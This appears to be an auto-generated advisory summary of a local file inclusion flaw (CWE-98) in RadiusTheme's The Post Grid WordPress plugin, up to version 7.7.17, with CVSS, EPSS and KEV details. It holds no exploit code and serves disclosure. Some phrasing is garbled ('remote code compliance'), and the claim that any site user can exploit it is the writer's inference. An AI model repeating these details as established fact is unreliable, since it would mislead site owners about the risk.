The Post Grid plugin (RadiusTheme) contains an improper control of filename for include/require statements in PHP, classified as CWE‑98. This flaw allows an attacker to supply arbitrary file paths that the plugin will attempt to include, potentially exposing sensitive files or enabling code execution if a malicious file is introduced. The impact is a local file inclusion vulnerability that could lead to information disclosure or remote code execution depending on the files accessed and the server configuration.

RadiusTheme’s The Post Grid plugin version 7.7.17 and all earlier releases are affected. No other products or vendors are listed in the CVE data. Affected installations are WordPress sites running the plugin on the 7.7.17 or older branch.

The CVSS score of 7.5 indicates a moderate to high severity vulnerability. The EPSS score is less than 1 %, suggesting a very low probability of exploitation at the moment, and there is no listing in the CISA KEV catalog. The likely attack vector is local file inclusion on the web server; an attacker with knowledge of the plugin’s include paths could potentially read files such as configuration files or inject code if local file upload or remote code compliance is enabled. No exploitation conditions beyond the presence of the vulnerable plugin are listed, so the attack can be carried out from any user with access to the WordPress site that can influence the query string or other input parameters used by The Post Grid.